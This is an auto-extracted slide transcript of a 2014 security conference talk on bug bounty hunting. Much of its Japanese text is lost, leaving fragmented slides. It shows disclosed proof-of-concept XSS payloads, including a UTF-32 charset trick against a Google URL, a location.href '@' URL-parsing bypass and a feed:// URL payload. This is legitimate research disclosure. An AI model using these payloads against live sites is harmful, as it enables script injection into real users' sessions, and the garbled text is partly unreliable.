Transcript of CODE BLUE 2014 : バグハンターの愉しみ by キヌガワマサト Masato Kinugawa
- 1. MasatoKinugawa
- 2. MasatoKinugawa () XSS
- 3. BountyProgram
- 4. BugBounty
- 5. 27135346
- 6. 27135346 (8)
- 7. !2010Google !
- 8. !GoogleVulnerabilityRewardProgram !1=$100~20,000 $130,803.7
127(/191)
- 9. UPUP!$
- 10.
- 11. ! ! ! !
- 12. !Google !$5,000()
- 13. https://accounts.google.com/example?oe=utf-32 HTTP/1.1200OK
Alternate-Protocol:443:quic,p=0.01 Cache-Control:private,max-age=0
Content-Encoding:gzip Content-Type:text/html;charset=UTF-32 ...
!URL !UTF-32
- 14. scriptalert(1)/script
- 15.
- 16. 0000220000003E0000003C00 000000730000006300000072
000000690000007000000074 00003E00000000610000006C
000000650000007200000074 000000280000003100000029
00003C000000002F00000073 000000630000007200000069
000000700000007400003E00 s c r i p t a l e r t ( 1 ) / s c r i p t
UTF-3241
- 17. IEUTF-32 0000220000003E0000003C00 000000730000006300000072
000000690000007000000074 00003E00000000610000006C
000000650000007200000074 000000280000003100000029
00003C000000002F00000073 000000630000007200000069
000000700000007400003E00 s c r i p t a l e r t ( 1 ) / s c r i p
t
- 18. http://l0.cm/encodings/table/
- 19. IE( s c r i p t > a l e r t ( 1 ) / s c r i p t
>
- 20. / 1 1 1 1 1 11 11 11 1 1 11 11 11 111 11 11 11 1 1 11 1 1 1
1 1
- 21. !28.7% !87%IE
- 22. ! !IE Web
- 23. location.hrefJavaScript URL1 http://example.com/
http://example.com/ location.href
- 24. http://evil%2F@example.com/ location.href
http://evil/@example.com/ @URL URL
- 25. location.href @
- 26. http://evil%2F@www.youtube.com/
- 27. ! !RSSfeed://URL !URL@ ! XSS(^o^)/
- 28. feed://URL (=)
- 29. XSS XSS
- 30.
- 31. feed://l0.cm%2Fcb.rss%3F@codeblue.jp/
- 32. feed://l0.cm%2Fcb.rss%3F@codeblue.jp/ alert('CODEBLUE2n'+
document.domain+'')
- 33. !/ ! http://masatokinugawa.l0.cm/
- 34. ! ! !XSS6
- 35. ! 22009 ! !XSS6 2009
- 36. 2009 2010
- 37. : Google
- 38. ! !
- 39. ! ! ! ! !
- 40. 1
- 41. ()
- 42.
- 43. @kinugawamasato masatokinugawa[at]gmail.com Contact